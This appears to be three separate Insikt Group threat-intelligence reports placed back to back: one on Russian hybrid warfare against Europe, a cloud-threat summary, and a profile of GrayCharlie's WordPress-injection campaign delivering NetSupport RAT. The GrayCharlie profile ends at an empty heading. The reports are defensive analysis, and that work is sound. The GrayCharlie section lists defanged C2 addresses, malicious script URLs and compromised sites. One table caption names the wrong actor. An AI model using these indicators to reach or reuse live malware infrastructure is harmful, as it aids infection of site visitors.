Russian “active measures” serve as a force multiplier for Moscow’s broader political warfare, integrating influence operations, propaganda, and sabotage. In Europe, these efforts aim to weaken transatlantic cohesion, erode public and political support for Ukrainian sovereignty and assistance to Kyiv, and exacerbate internal societal divisions, economic uncertainty, and other challenges. By cultivating sanctions fatigue and encouraging selective bilateral re-engagement with Russia through active measures, Moscow seeks to mitigate its international isolation and undermine the rules-based international order, thereby advancing a Russia-favored multipolar system characterized by exclusive spheres of influence. Notably, these activities also include angles of domestic preservation by portraying the West as chaotic, corrupt, and immoral, and thereby discouraging the expansion of liberal democracies elsewhere, particularly from within.

Since Russia’s full-scale invasion of Ukraine in 2022, Insikt Group has observed concentrated Russian influence operations targeting the domestic audiences of what Moscow likely views as Kyiv’s core European supporters: the UK, France, Germany, and Poland. Insikt Group investigations, in addition to public reporting, have previously identified multiple influence operations targeting the above-mentioned major European allies, including Doppelgänger, Operation Overload, Operation Undercut, and CopyCop. These influence operations have commonly impersonated national and pan-European media outlets to disseminate messages aligned with Kremlin propaganda, including anti-Ukraine themes and content that denigrates pro-European political figures. Elsewhere, Russian influence operations have sought to use fear and physical demonstrations to manipulate public opinion. In France, for example, Russia-linked physical intimidation very likely intended to provoke public anxiety and societal unrest included the Star of David and red hand graffiti, as well as the placement of caskets near the Eiffel Tower ahead of the 2024 Paris Olympic Games. Similar efforts have also appeared elsewhere in Europe, including the emergence of pro-Russian billboards in Italy and the "Children of War, Alley of Angels" exhibit in Germany.

Russian influence efforts have also leveraged illicit financing and alleged bribery to attempt to favorably reshape European politics. For example, in spring 2024, Czech authorities attributed the Voice of Europe, an organization linked to Viktor Medvedchuk, to paying politicians in several EU countries to spread anti-Ukraine messages. In September and October 2024, Moldovan police reported that a Russia-linked network, allegedly run by fugitive oligarch Ilan Shor, channeled tens of millions of dollars to buy votes ahead of Moldova’s October 20, 2024, presidential election and EU referendum. In December 2024, Romanian prosecutors conducted raids and opened probes into alleged illegal campaign financing and payments to TikTok users and influencers associated with the then-annulled presidential vote. More recently, former UK Member of the European Parliament (MEP) Nathan Gill was sentenced on November 21, 2025, after pleading guilty for accepting bribes to make pro-Russian statements.

Insikt Group assesses Russia’s NGW against Europe will likely consist of aggressive influence operations targeting Europe that aim to erode European unity and advance Russia’s quest for a multipolar world order. NGW will very likely continue supporting Moscow’s core objectives of eroding political and public support for Ukrainian sovereignty and assistance to Kyiv, accelerate sanctions fatigue, and exploit domestic political crises and election cycles to fracture European cohesiveness and transatlantic cooperation. Moscow will likely expand its reliance on access to third parties and intermediaries, including sympathetic socio-political organizations and fringe movements, to launder Kremlin-aligned messages into the European information environment.

Across Europe, Russia will almost certainly continue to attempt to delegitimize existing democratic institutions and Europe’s information ecosystem by continuing to foster distrust in elections, mainstream media, the EU, and pro-European government figures. In a post-war environment, assuming European sanctions on Russian media enterprises are lifted, Russia will very likely attempt to reestablish its state media presence while also hardening itself to withstand future disruptions, legal restrictions, and platform or government takedowns in the event of a kinetic conflict with Europe.

New Generation Warfare operations against Europe will very likely incorporate much of Russia’s current-era influence tradecraft, including social media influence via human and automated networks, media impersonation and covert media outlet brands, illicit financing and bribery, and cyber-enabled influence such as hack-and-leak narratives. Further, Insikt Group assesses Moscow will very likely continue attempting to cultivate sympathetic allies through covertly funded fringe socio-political organizations, using these entities to astroturf “grassroots” support, amplify Kremlin-aligned narratives, and catalyze or intensify domestic unrest across Europe. We assess that Russia will also adapt emerging technologies, particularly AI, to scale the production, localization, and quality of influence content, increase dissemination efficiency, and optimize targeting. Continued advances in generative AI will almost certainly improve the realism of propaganda images and fabricated reporting, forged documents and correspondence, and synthetic impersonations of public figures, including audio and video deepfakes.

Airspace Incursions by Drones and Jets

Beginning in September 2025, suspected violations of NATO airspace by Russia-directed drone operators or Russian jets increased to unprecedented levels, as Russia likely sought to project power across NATO territory and test NATO resolve while maintaining plausible deniability. Insikt Group tracked 30 suspected or confirmed violations between September 2025 and January 2026, compared to 23 suspected or confirmed violations between March 2022 and August 2025. The most commonly targeted countries since March 2022 have been Poland and Romania; however, suspected Russian violations of NATO airspace have occurred outside of Russia’s historic sphere of influence, including in Germany, UK, Denmark and Norway. Violations have most frequently targeted critical infrastructure, such as military bases and airports.

In a full-scale New Generation Warfare-like campaign in Europe, Russia likely would escalate the frequency and level of aggressiveness of these violations. Russia’s targeting would likely continue to focus on critical infrastructure, but violations would very likely significantly increase in frequency. Russia would also likely use drones to fly closer to targets and perhaps hover over them for extended periods of time, in a likely effort to test NATO’s willingness to shoot down drones and perhaps collect intelligence on critical infrastructure facilities. Indeed, in September 2025, Polish authorities said they shot down Russian drones that violated Poland’s airspace.

Other ways Russia would likely escalate the aggressiveness of its airspace violations include timing those violations with major NATO events, such as military exercises and summits. Russia could escalate its use of drones as electronic warfare mechanisms, perhaps to disrupt NATO military exercises or the functioning of critical infrastructure facilities.

Russia would likely also use its drones to amplify its psychological warfare as a way of projecting power and demonstrating to the public that Moscow can disrupt everyday life in NATO countries. Russia could do this via tactics such as hovering drones over civilian transportation infrastructure, like railways or airports, which have already been forced to temporarily close. Russia could also launch drones over facilities hosting political summits, such as the annual NATO Summit, or over polling places during elections to stoke public fear. In a full-scale NGW campaign that involves coordination of multiple tactics, Russian propaganda outlets might release footage of these incidents to propagate a narrative that NATO states cannot protect their infrastructure. Russia could also combine drone or jet violations with sabotage operations to further sow public panic and force NATO governments into a defensive posture.

Russia would very likely seek to maintain some level of deniability and would avoid airstrikes and mass casualty events, which would almost certainly guarantee an Article 5 declaration.

Territorial Waters Violations and Targeting of Undersea Cables

Insikt Group assesses that, since February 2022, Russia has increasingly used violations of NATO states’ territorial waters⁴ and targeting of undersea cables to test the alliance’s resilience, collect intelligence, keep NATO in a reactive, defensive posture, and attempt to deter NATO from undermining Russian strategic interests. In June 2023, Deputy Chairman of the Security Council Dmitriy Medvedev stated that, “if we proceed from the proven complicity of Western countries in blowing up the Nord Streams, then we have no constraints — even moral — left to prevent us from destroying the ocean-floor cable communications of our enemies.” Medvedev’s comments were likely purposefully hyperbolic; however, they likely reflect a Kremlin perception that NATO is targeting Russian strategic interests, thereby justifying retaliatory action.

Examples of Russia likely targeting undersea cables and maritime assets include an April 2025 incident in which the UK identified Russian sensors attempting to collect intelligence on UK nuclear submarines and other underwater critical infrastructure; the Russian Yantar surveillance ship sailing near cables carrying data for Google and Microsoft under the Irish Sea in November 2024; and reports suggesting that the Russian Eagle S ship accused of damaging multiple undersea cables in December 2024 carried spy equipment to monitor naval activity.

Russian ships have also violated NATO states’ territorial waters, likely to test NATO resilience, force NATO into a defensive posture, and project power. Examples include a July 2025 incident in which a Russian border guard vessel entered Estonian territorial waters without permission; a July 2024 incident in which a Russian naval vessel entered Finnish territorial waters without authorization; and frequent encounters between NATO states and Russia-linked “shadow fleet” vessels. These vessels are tankers sailing under other flags, which often refuse inspection or orders from local navies.

During a full-scale New Generation Warfare campaign against NATO, Russia likely would escalate its targeting of undersea cables and violations of territorial waters. This could include more frequent cable targeting, likely to cause minor but persistent damage to undersea critical infrastructure that tests NATO resilience and Russian destructive capabilities without provoking an Article 5 declaration. Russia could also conduct electronic jamming operations during cable repairs to inhibit communications and use Russian ships to harass those conducting repairs.

Russia would also likely attempt longer and more provocative territorial waters violations, including placing Russian ships near NATO vessels and expanding these activities into areas such as the Mediterranean; conducting concurrent hybrid activity such as GPS jamming and automatic identification system (AIS) spoofing; refusing escort out of territorial waters; and combining territorial waters violations with airspace violations by Russian aircraft or targeting of undersea infrastructure.

Russia would likely aim to overwhelm NATO’s existing efforts to prevent sabotage of undersea infrastructure. In January 2025, Allied Joint Force Command Brunssum (JFCBS) launched Baltic Sentry — a campaign that uses tools such as frigates, maritime patrol assets, and naval drones to deter sabotage of undersea infrastructure. Since the launch of Baltic Sentry, the Baltic Sea has experienced very few undersea sabotage efforts; however, it is not clear whether this is the result of Baltic Sentry or a lack of planned operations.

Sabotage Operations

We assess Russia has escalated its use of sabotage operations in NATO territory since its full-scale invasion of Ukraine in 2022, likely to test the resilience particularly of NATO states’ critical infrastructure; propagate a narrative that Western states cannot protect their populations from threats; harm NATO’s ability to collectively respond to Russian aggression by forcing NATO into a reactive, defensive posture; and degrade NATO states’ ability to provide material support to Ukraine. Sabotage operations are loosely defined, but typically consist of targeting civilian or dual-use infrastructure with physical security attacks by deniable entities.

Particularly since 2022, Russia-linked entities have focused sabotage operations on critical infrastructure in NATO states, exploiting vulnerabilities wrought from deferred maintenance and lack of sufficient public or private investment in upkeep. Within critical infrastructure, the most frequently targeted sectors include undersea telecommunication and power cables; water supply and distribution; transportation; military; healthcare; and telecommunications. The number of Russian sabotage operations has quadrupled from 2023 to 2024, and in 2025, it was likely at levels consistent with 2024. Operations have occurred across NATO, as opposed to being focused in Russia’s historic sphere of influence. That said, the most commonly targeted states between January 2018 and June 2025 were Germany, Estonia, Latvia, Lithuania, and Poland.

In a New Generation Warfare-like campaign targeting NATO territory, Moscow would likely move from what we assess has thus far been largely opportunistic sabotage to operations with more consistency and geographic breadth, and that complement other tactics.

Russia would likely still focus its sabotage operations on critical infrastructure, but would likely place a premium on damaging the critical infrastructure of NATO states that either would be probable targets of a Russian military incursion — such as Poland or the Baltic states — or would lend significant assistance to those states, such as the UK, Germany, or France. This is because in an NGW campaign, Russia would likely view sabotage operations as, in part, a way to test the resilience of potential victim states and their allies. Russia’s sabotage operations against those targets would likely be more frequent and could coincide with significant events such as elections or military exercises. Russia would likely pair sabotage operations with other tactics, such as offensive cyber operations or airspace violations, to augment the destructive impact of the operations and try to strain NATO states’ capacity by forcing them to respond to multiple disruptions at once, while still staying below the threshold that would risk an Article 5 declaration.

Offensive Cyber Operations for Disruption and Counterintelligence

Russian cyber activity directed at European targets has consistently emphasized access-oriented operations, including attacks on internet-facing firewalls, virtual private networks (VPNs), email services, and web portals. This activity aligns with documented Russian cyber practices focused on enabling intelligence collection, operational reach, and long-term flexibility rather than immediate disruptive effects. Recent Insikt Group reporting highlights BlueEcho activity targeting perimeter infrastructure to establish footholds and enable follow-on credential capture and lateral movement, while BlueDelta campaigns demonstrate sustained credential harvesting at scale using impersonated Microsoft Outlook Web App (OWA), Sophos VPN, and Google login workflows. This tradecraft is low-cost, repeatable, and consistent with long-term counterintelligence targeting of government, defense, and research entities.

Russian cyber activity affecting Europe has been broad in scope, with targeting observed across multiple regions and sectors. If cyber operations were used for more overtly disruptive purposes, effects would likely be more pronounced in states with weaker cybersecurity maturity or slower coordinated response mechanisms, such as fragmented local-government IT environments or limited national incident response surge capacity. This does not preclude activity against major NATO states, where Russian cyber operations have historically focused more heavily on intelligence collection and access. BlueDelta’s targeting of NATO-aligned and defense-related organizations reflects continued Russian interest in strategically valuable European targets aligned with GRU intelligence requirements.

Observed Russian cyber activity also provides insight into how operations could escalate if strategic conditions were to change and Russia were to launch a full-scale NGW campaign. Russian threat actors have demonstrated the ability to establish and maintain access over time, including through persistent connections and tunneling, which could be repurposed to degrade remote access services, manipulate edge-device configurations, or cause temporary service disruption. In Ukraine, cyber activity has been observed alongside influence operations and physical sabotage, including Recorded Future–tracked influence campaigns such as CopyCop, which leveraged automated content replication and spoofed media infrastructure to amplify pro-Russian narratives in parallel with other forms of hybrid activity. If applied elsewhere, similar coordination could increase pressure on incident response capabilities and undermine public confidence in the reliability of essential services. Credential-harvesting operations further provide pathways beyond inbox access, including potential compromise of identity providers, VPN portals, and privileged administrative portals.

Russian cyber operations have historically involved establishing and maintaining access to targeted networks over extended periods, a pattern also documented in prior campaigns in Ukraine. However, there is no public evidence demonstrating that the access currently observed in European networks is intended for future disruptive operations. If a kinetic conflict were to escalate in Europe, Russia would likely seek to expand or prioritize access within relevant networks to support intelligence collection, operational coordination, or potential disruption. Russia also has a documented history of tolerating or leveraging cybercriminal activity alongside state-directed operations, including overlap with criminal infrastructure and access brokers, which may allow operators to expand scale, complicate attribution, and generate disruptive effects without overtly exposing state-linked capabilities. Collectively, activity associated with BlueAlpha, BlueDelta, BlueEcho, Sandworm, and Dragonfly illustrates Russia’s ability to scale cyber operations from access and intelligence collection toward disruption if strategic conditions were to change, consistent with broader hybrid and New Generation Warfare practices.

Exploitation of European Dependence on Russian Oil and Natural Gas

Russia has long exploited other states’ dependence on its natural gas and oil to exercise leverage over them, typically by strategically decreasing supply flows, particularly during high-demand periods, such as winter. For example, in 2006, Georgia accused Russia of intentionally cutting gas supplies during an unusually cold period to increase political pressure on Tbilisi. In the run-up to Russia’s full-scale invasion of Ukraine in February 2022, Russian state gas company Gazprom reduced natural gas deliveries to Europe, likely in an effort to pressure Europe into abandoning a unified stance on supporting Ukraine.

Since 2022, many NATO states have sought to reduce their dependence on Russian natural gas and oil; however, several states remain dependent, including Slovakia, Hungary, and Türkiye. In a full-scale New Generation Warfare campaign in Europe, Russia would very likely escalate its exploitation of those states’ dependence on Russian energy imports to demonstrate Moscow’s ability to degrade European critical infrastructure, undermine NATO unity, gauge the resilience of these states’ critical infrastructure, and test Russia’s ability to handicap critical infrastructure, should Putin decide to launch a military incursion into NATO territory.

Moscow’s willingness to exploit these states’ dependence on Russian energy likely varies by state. Moscow is less likely to exploit Hungary’s dependence on Russian oil and gas, given Budapest’s strong relations with Russia. Slovakia is a more likely target, as it seeks a positive relationship with Moscow, but is likely of less strategic importance to Russia than Hungary. Moscow’s relations with Türkiye have fluctuated between positive and adversarial; the likelihood of exploiting Türkiye’s dependence on Russian energy imports would likely depend, in part, on how positive the overall Russia-Türkiye relationship is at that time.

Escalation of economic critical infrastructure targeting would likely take the form of both more frequent and more geographically broad operations, particularly during high-demand periods such as the winter and perhaps during NATO military exercises or elections. Russia could also escalate its use of pricing manipulation to punish states that work against Russia’s strategic priorities in Ukraine, and reward pro-Russia states such as Hungary.

Russia would also likely combine supply cuts with sabotage operations. For example, in 2006, Moscow cut gas supplies in Georgia at the same time it sabotaged an electricity line. Following a successful operation, pro-Russia propaganda outlets would likely amplify narratives that claim European critical infrastructure is weak and vulnerable, and that this demonstrates the inadequacy of democracy and the Western political system writ large at fulfilling basic public needs.

In a New Generation Warfare campaign against Europe, Russia would be unlikely to seek permanent damage to European critical infrastructure or mass civilian harm from disruption of energy flows. Russia would also likely avoid long-term disruption of oil and gas deliveries to limit the financial impact, since oil and gas revenues comprise roughly 25% of Russia’s annual federal revenue.

Indicators of NGW Campaign in Europe, Implications for Public and Private Sectors, and Recommended Mitigations

Tactic: Influence Operations

Indicators of NGW Campaign

• Increased convergence of narratives across propaganda outlets, including state media, inauthentic social media accounts, and so on
• Parallel narratives tailored to each country or region

Implications for Public and Private Sectors

• Public Sector: more pronounced political polarization; reduced public trust in government competence
• Private Sector: brand damage if firms are targeted in influence operation (IO) campaigns; employee or executive harassment or doxxing

Recommended Mitigations

• Ensure communication response protocols are in place, such as rapid rebuttal measures
• Ensure information environment monitoring is attuned to Russia-nexus narratives so inauthentic behavior can be detected quickly

Tactic: Airspace Incursions by Drones and Jets

Indicators of an NGW Campaign

• More frequent incursions that last longer and target strategic sites such as military training grounds, critical infrastructure nodes, and so on
• Incursions are conducted at lower altitudes, with transponders turned off
• Violations are clustered around NATO decisions or major military exercises

Implications for Public and Private Sectors

• Public: forced closures of critical infrastructure sites during airspace violations, thereby disrupting operations, as well as likely escalation of public alarm and potential decrease in public confidence in the government’s ability to keep critical infrastructure safe
• Private: business operation disruptions due to critical infrastructure closures

Recommended Mitigations

• Strengthen counter-measures against unmanned aircraft systems (UASs) around critical sites
• Ensure joint civil-military air incident protocols are in place, including aviation alerts and Notice to Airmen (NOTAM) coordination
• Improve GPS resilience

Tactic: Territorial Waters Violations and Targeting of Undersea Cables

Indicators of an NGW Campaign

• More frequent territorial waters violations
• Violations by state-linked vessels
• Non-compliance with escort or hails; risky maneuvering around NATO state vessels, perhaps to provoke potential collisions
• Increased loitering of suspicious vessels near cable routes and landing areas
• Repeated “anchor drag” incidents
• Interference with repair ships
• Simultaneous cyber activity against telecommunications and energy operators

Implications for Public and Private Sectors

• Public: intermittent communications degradation; potential harm to energy infrastructure
• Private: major potential operational losses for telecommunications, finance, and other key sectors; potential increases in insurance costs for shipping companies, should territorial waters violations at ports become common

Recommended Mitigations

• Consider mapping alternative sea routes in case primary routes are disrupted; consider rapid reroute contracts
• Ensure sufficient port and state coordination
• Ensure physical hardening at cable landing sites
• Expand Baltic Sentry efforts to other locations

Tactic: Sabotage Operations

Indicators of an NGW Campaign

• More frequent operations, including arson, vandalism, explosions, and rail disruptions
• Targeting of high-priority sites, such as military logistics hubs, defense suppliers, and so on
• Targeting of civilian sites, such as shopping malls or residential neighborhoods
• Concurrent operations in multiple geographic regions, suggesting intentional planning
• Combined sabotage operations and airspace or territorial waters violations

Implications for Public and Private Sectors

• Public: potential reduction in public confidence in government’s ability to protect critical infrastructure and residential areas; in the event of significant escalation in sabotage operations, emergency services could be strained
• Private: facility damage or loss; threat to worker safety; supply chain interruption; business interruption; reputational liability

Recommended Mitigations

• Expand insider threat and contractor vetting at critical infrastructure sites
• Ensure physical security measures are in place, including perimeter detection, anti-drone measures, camera coverage, and access control
• Enhance public-private partnerships, as most of the critical infrastructure NATO relies upon is commercially owned
• Ensure rapid liaison channels with law enforcement and intelligence services

Tactic: Offensive Cyber Operations

Indicators of an NGW Campaign

• Campaigns that target strategic pressure points, such as logistics and transportation hubs, defense supply chains, and local government entities
• Intrusion and distributed denial-of-service (DDoS) activity spikes at politically significant moments, including elections, military exercises, or geopolitical summits
• Campaigns that blend state and proxy activity, such as hacktivist DDoS campaigns that amplify Kremlin-aligned narratives
• Coupling of multiple tactics, such as cyber and influence operation hybrid campaigns

Implications for Public and Private Sectors

• Public: DDoS and ransomware campaigns can undermine public confidence in the reliability of institutions; compromise of government narratives can result in less public confidence in the truth of government messaging; even attempted election manipulation can reduce confidence in voting systems
• Private: elevated risk of disruption of key logistics, transport, rail, and aviation systems; hack and leak operations pose risk to reputation, personally identifiable information, and intellectual property rights; targeting of critical infrastructure can result in operational disruption

Recommended Mitigations

• Enforce phishing-resistant multi-factor authentication
• Implement conditional network access based on geopolitical and risk factors
• Patch for commonly exploited software
• Reduce exposure (lock down admin portals; restrict by IP address; remove unused services)
• Use DDoS protection, autoscaling
• Coordinate with the national computer emergency response team (CERT) and National Counterintelligence and Security Center (NCSC), as well as upstream providers; rehearse continuity plans
• Require multi-factor authentication (MFA) and logging parity from third-party providers; segment privileged access; monitor for abnormal remote management activity

Tactic: Leveraging Economic Dependence

Indicators of an NGW Campaign

• Supply manipulation, including threats or actions to raise price volatility
• Exploitation of legal measures, including sudden contract disputes or claims of force majeure
• More frequent cessation of oil and gas supplies, especially during high-demand periods such as winter

Implications for Public and Private Sectors

• Public: higher energy bills and supply disruption, potentially leading to public dissatisfaction
• Private: price shocks, supply uncertainty, costs related to resolving alleged contract disputes

Recommended Mitigations

• Diversify suppliers and routes
• Ensure on-site backup generation where feasible

Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:

• Exploitation and Misconfiguration
• Cloud Abuse
• Cloud Ransomware
• Credential Abuse, Account Takeover, and Unauthorized Access
• Third-Party Compromise

Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security gateways, and enterprise resource planning (ERP) platforms — as well as stolen or weakly governed credentials sourced from public leaks, compromised developer workstations, and socially engineered helpdesk workflows. Once inside a targeted environment, threat actors systematically pivot through hybrid identity and virtual private network (VPN) infrastructure, targeting directory-synchronized accounts, non-human and executive identities, and privileged cloud roles to gain tenant-wide administrative control.

Post-compromise activity is characterized by heavy use of built-in cloud and SaaS functionality: enumerating and exfiltrating data via native storage and backup services, destroying or encrypting cloud backups and snapshots for impact, manipulating static frontends and continuous integration/continuous deployment (CI/CD) pipelines to subvert trust in applications and repositories, and using mainstream platforms such as calendar services as covert command-and-control (C2) channels.

In comparison to its previous iteration, the majority of the events discussed in this report indicate that threat actors are engaging in similar threat behaviors; however, there are three specific trends that appear to have emerged since the most recent iteration:

• Cloud threat actors are registering their own legitimate cloud resources for use in attack chains.
• DDOS attacks are becoming less effective when targeting cloud environments, even in instances of record-breaking throughput, due to increased cloud-native capabilities for mitigating these threats.
• Cloud threat actors are increasingly diversifying the types of services that they target in victim environments during an attack chain, with a notable focus on LLM and other AI-powered services hosted in cloud environments.

The trends associated with abuse indicate a shift in threat actor perception, demonstrating that threat actors are exploring the broader benefits that compromised cloud services can provide.

Download Cloud Threat Landscape: Executive Insights

Insikt Group has been monitoring GrayCharlie, a threat actor overlapping with SmartApeSG and active since mid-2023, for some time, and is now publishing its first report on the group. GrayCharlie compromises WordPress sites and injects them with links to externally hosted JavaScript that redirects visitors to NetSupport RAT payloads delivered via fake browser update pages or ClickFix mechanisms. These infections often progress to the deployment of Stealc and SectopRAT. Insikt Group identified a large amount of infrastructure linked to GrayCharlie, primarily tied to MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, both actor-controlled and compromised staging infrastructure, and higher-tier infrastructure used to administer operations. While most compromised websites appear to be opportunistic and span numerous industries, Insikt Group identified a cluster of United States (US) law firm sites that were likely compromised around November 2025, possibly through a supply-chain compromise involving a shared IT provider.

To protect against GrayCharlie, security defenders should block IP addresses and domains tied to associated remote access trojans (RATs) and infostealers, flag and potentially block connections to compromised websites, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section of this report for implementation guidance and Appendix A for a complete list of indicators of compromise (IoCs).

Key Findings

• GrayCharlie, which overlaps with SmartApeSG and first emerged in mid-2023, is a threat actor that injects links to externally hosted JavaScript into compromised WordPress sites. These links redirect victims to NetSupport RAT infections delivered via fake browser update pages or ClickFix techniques, ultimately resulting in Stealc and SectopRAT infections.
• Insikt Group identified a wide range of GrayCharlie infrastructure, largely associated with MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, staging infrastructure made up of both actor-controlled and compromised infrastructure, as well as components of GrayCharlie’s higher-tier infrastructure used to manage its operations.
• Insikt Group identified two primary attack chains associated with GrayCharlie: one in which victims encounter fake browser update pages after visiting compromised websites, and another in which they are presented with a ClickFix pop-up, a technique that has become increasingly common in 2025.

Background

GrayCharlie is Insikt Group’s designation for a threat activity group that first appeared in mid-2023 and is behind SmartApeSG, also referred to as ZPHP or HANEYMANEY. The group’s operations typically involve injecting malicious JavaScript into legitimate but compromised WordPress sites. Visitors to these sites are shown convincing, browser-specific fake update prompts (such as for Chrome, Edge, or Firefox) that encourage them to download what appears to be an update but is actually malware.

In late March or early April 2025, SmartApeSG shifted from using fake browser updates to deploying ClickFix lures, mirroring a broader trend among threat actors of increasingly adopting ClickFix.

GrayCharlie predominantly delivers NetSupport RAT; however, deployments of Stealc and, more recently, SectopRAT, have been observed in rare instances. The group’s ultimate objectives remain uncertain. Current evidence suggests a focus on data theft and financial gain, with a theoretical, but unsubstantiated, possibility that it may sell or transfer access to other threat actors.

Threat Analysis

Insikt Group has been tracking GrayCharlie for an extended period and has observed the actor’s persistent behavior since its emergence in 2023. GrayCharlie continues to conduct the same types of operations, regularly deploying large volumes of new infrastructure and adhering to consistent tactics, techniques, and procedures (TTPs), including continued use of the same infection chains and NetSupport RAT payloads. The group targets organizations worldwide, with a particular focus on the US. The following sections provide a detailed examination of GrayCharlie’s operational infrastructure and its two primary attack chains.

Infrastructure Analysis

NetSupport RAT Clusters

Insikt Group identified two main NetSupport RAT clusters linked to GrayCharlie based on factors such as TLS certificates, NetSupport serial numbers and license keys, and the timing of the activity (see Figure 1). In addition, Insikt Group identified a range of other NetSupport RAT C2 servers linked to GrayCharlie activity, but which are not currently attributed to either of the two main clusters. Insikt Group assesses that these clusters may correspond either to different individuals associated with GrayCharlie or to distinct GrayCharlie campaigns. The clusters are further described below.

Figure 1: Overview of GrayCharlie clusters observed in 2025 (Source: Recorded Future)

Cluster 1

Cluster 1 comprises NetSupport RAT C2 servers whose TLS certificates display a recurring monthly naming pattern. All servers in this cluster are hosted by MivoCloud and were deployed between March and August 2025. Notably, NetSupport RAT samples associated with the cluster’s March and April infrastructure used the license key DCVTTTUUEEW23 and serial number NSM896597, before shifting to the license key EVALUSION and serial number NSM165348 in subsequent deployments. The C2 servers associated with this cluster are listed in Table 1.

Table 1: NetSupport RAT C2 servers linked to Cluster 1 (Source: Recorded Future)

Notably, the NetSupport RAT C2 servers in Cluster 1 are connected not only through the characteristics previously described, but also by the near-simultaneous creation of their TLS certificates. For example, the TLS certificate with the common name june5ebatquot associated with IP address 94[.]158[.]245[.]135 was generated on June 30, 2025 at 4:55:20 PM, while the certificate with the common name june6 linked to 94[.]158[.]245[.]174 was created only 20 seconds later.

Cluster 2

Cluster 2 comprises NetSupport RAT command-and-control servers whose TLS certificates typically start with two or more repetitions of “s”, followed by an “i” and a number (so “sssi3”, for example). NetSupport RAT samples linked to Cluster 2 used the license key XMLCTL and serial number NSM303008. The NetSupport RAT C2 servers typically also host an instance of the vulnerability scanner Acunetix. The C2 servers associated with this cluster are listed in Table 2. Notably, all TLS certificates associated with this cluster were created in a single batch on June 17, 2025.

Table 2: NetSupport RAT C2 servers linked to Cluster 2 (Source: Recorded Future)

Of note, one NetSupport RAT C2 server (94[.]158[.]245[.]56) used a TLS certificate with the common name 23sss, created in May 2025, and was linked to a NetSupport RAT sample that carried the same license key (EVALUSION) and serial number (NSM165348) previously observed in Cluster 1.

Other NetSupport RAT C2 Servers

Insikt Group identified an additional set of NetSupport RAT C2 servers linked to GrayCharlie that did not form a distinct cluster (see Table 3). However, all the servers were hosted by MivoCloud and were associated with NetSupport RAT samples using license key and serial number combinations observed in Clusters 1 and 2.

Table 3: Additional NetSupport RAT C2 servers linked to GrayBravo (Source: Recorded Future)

Staging Infrastructure

Once GrayCharlie victims land on the compromised WordPress sites, thereby satisfying the conditional logic, the payload is typically fetched from the attacker-controlled infrastructure and injected into the compromised WordPress sites. Insikt Group has identified two distinct types of staging infrastructure, each characterized by different website templates. Type 1 is modeled after “Wiser University,” and Type 2 is modeled after “Activitar.”

Type 1: “Wiser University”

The IP addresses associated with the Type 1 staging infrastructure are linked to websites impersonating “Wiser University” (see Figure 2), a fictional entity used to demonstrate Wiser, a free Bootstrap HTML5 education website template for school, college, and university websites. (As a sidenote, Oreshnik is the name of a Russian intermediate-range ballistic missile reportedly capable of speeds exceeding Mach 10.) Appendix B lists the IP addresses associated with the Type 1 staging infrastructure. All IP addresses, except for one, are announced by AS202015 (HZ Hosting Ltd).

Figure 2: Website impersonating “Wiser University” (Source: Recorded Future)

Suspected Testing Infrastructure

Although most IP addresses associated with the Type 1 staging infrastructure are announced by AS202015, as shown in Appendix B, Insikt Group also identified a small subset announced by other ASNs that host the same websites (see Table 4). On average, approximately one such IP address appears to be established each month. Notably, most of these IP addresses appear to geolocate to Russia, and the same ASNs are consistently reused within the same timeframe.

Table 4: Additional infrastructure possibly linked to GrayCharlie (Source: Recorded Future)

Type 2: “Activitar”

Insikt Group identified an additional set of staging infrastructure, referred to as “Type 2.” The IP addresses in this cluster commonly host specific websites (see Figure 3). Insikt Group assesses that this template was sourced elsewhere and is not unique to GrayCharlie.

Figure 3: Website impersonating “Activitar” (Source: Recorded Future)

A subset of domains and IP addresses associated with Type 2 is presented in Table 5. Notably, most of the IP addresses are also announced by AS202015 (HZ Hosting Ltd), and one domain in Table 5, filmlerzltyazilimsx[.]shop, is linked to the email address oreshnik[@]mailum[.]com through its WHOIS record.

Table 5: Domains and IP addresses linked to Type 2 staging infrastructure (Source: Recorded Future)

Compromised Infrastructure

GrayCharlie commonly injects malicious scripts into the Document Object Model (DOM) of compromised WordPress sites using script tags. Insikt Group has identified several recurring URL patterns tied to this activity: some URLs load externally hosted JavaScript files (such as hxxps://joiner[.]best/work/original[.]js), while others call a PHP file on specific endpoints using an ID parameter (such as hxxps://signaturepl[.]com/work/index[.]php?abje2LAw). Notably, these URLs are updated over time by the threat actor, complicating detection and indicating the threat actor maintains ongoing access to a large pool of compromised WordPress installations. Appendix A lists a subset of WordPress websites infected by GrayCharlie.

Although the exact initial access vector is unknown, it is likely that the actors either purchase access, such as via malware logs containing WordPress admin credentials, or exploit vulnerable WordPress plugins. The latter remains the most frequent cause of all WordPress compromises.

Suspected Compromise of “Law Firm Acceleration Company” SMB Team

While the GrayCharlie-linked compromised WordPress sites span a wide range of industry verticals, in a few rare instances, the threat actors appear to have obtained, either through their own intrusions or via a third party, a more targeted set of WordPress domains. Specifically, at least fifteen websites belonging to US law firms were observed loading the external JavaScript hosted at hxxps://persistancejs[.]store/work/original[.]js (see Table 6).

Insikt Group assesses that GrayCharlie (or the third party GrayCharlie works with) likely compromised these websites through a supply-chain vector. One potential avenue is SMB Team, the self-described “fastest-growing law firm acceleration company,” which has supported thousands of firms across North America, according to its website, as its logo and other references appear across many of the websites listed in Table 6 (see Figure 4). Notably, credentials associated with an SMB Team email address used for a WordPress hosting platform surfaced around the same time that the domain persistancejs[.]store first began resolving. This temporal overlap suggests that the threat actors may have gained access to SMB Team-related infrastructure through the use of legitimate, compromised credentials.

Table 6: Compromised law firm websites linked to GrayCharlie (Source: Recorded Future)

Notably, while an SMB Team compromise is possible, Insikt Group also assesses that the actors may have exploited a specific version of WordPress or its plugins used by SMB Team, which could explain the simultaneous compromise of all affected websites.

In some instances, the same compromised WordPress sites are compromised by multiple threat actors simultaneously. For example, bianchilawgroup[.]com was also breached by TAG-124 (also known as LandUpdate808 or Kongtuke) since at least December 2025, which used the domain vimsltd[.]com.

Higher-Tier Analysis

